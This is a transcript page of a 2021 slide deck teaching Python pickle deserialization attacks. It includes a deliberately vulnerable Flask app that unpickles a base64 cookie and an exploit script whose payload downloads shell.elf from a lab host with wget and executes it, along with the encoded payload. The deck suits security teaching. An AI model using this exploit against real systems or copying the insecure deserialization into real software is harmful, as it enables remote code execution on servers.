Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Introduction to Deserialization Attacks

Ayush Priya
November 16, 2021

Introduction to Deserialization Attacks

This talk provides an introduction to identifying and exploiting Deserialization Attacks with a sample scenario created with Python.

Ayush Priya

November 16, 2021
Tweet

More Decks by Ayush Priya

Other Decks in Technology

Transcript

  1. What is serialization? • Converting objects to storable data •

    Also known as marshalling • Deserialization - retrieving objects from serial data
  2. import pickle import os class BadUserClass(): def __init__(self, username): self.username

    = username def __reduce__(self): return (self.__class__, (os.system("whoami"),)) bad_user_obj = BadUserClass("ayush") serialized_obj = pickle.dumps(bad_user_obj) # Insecure deserialization user = pickle.loads(serialized_obj) print("Hello!, {}".format(user.username)) # Output: # desktop-fsv539h\ayush # Hello!, 0
  3. # flask_app.py import os import pickle from uuid import uuid1

    from flask import Flask, make_response, request from base64 import b64encode, b64decode # The User Class which assigns a random ID to each connection class UserID: def __init__(self, uuid=None): self.uuid = str(uuid1()) def __str__(self): return self.uuid # The main Flask Backend app = Flask(__name__) @app.route('/', methods=['GET']) def index(): obj = request.cookies.get('uuid') if obj == None: msg = "Seems like you didn't have a cookie. No worries! I'll set one now!" response = make_response(msg) obj = UserID() response.set_cookie('uuid', b64encode(pickle.dumps(obj))) return response else: return "Hey there! {}!".format(pickle.loads(b64decode(obj))) if __name__ == "__main__": app.run(host='0.0.0.0')
  4. What we need to do? • Create a payload •

    Serialize it, get Base64 value • Modify cookie’s value
  5. # exploit.py import os import pickle from base64 import b64encode

    PAYLOAD = "cd /tmp && wget http://10.0.2.15/shell.elf && chmod +x shell.elf && ./shell.elf" class Exploit(object): def __reduce__(self): return (eval, ("os.system('" + PAYLOAD + "')",)) exploit_code = pickle.dumps(Exploit()) print(b64encode(exploit_code)) # Output is: b'gANjYnVpbHRpbnMKZXZhbApxAFhcAAAAb3Muc3lzdGVtKCdjZCAvdG1wICYmIHdnZXQgaHR0cDovLzEwLjAuMi 4xNS9zaGVsbC5lbGYgJiYgY2htb2QgK3ggc2hlbGwuZWxmICYmIC4vc2hlbGwuZWxmJylxAYVxAlJxAy4='
  6. Mitigation • Don’t deserialize data from untrusted source • Limited

    access privileges • Safe deserialization methods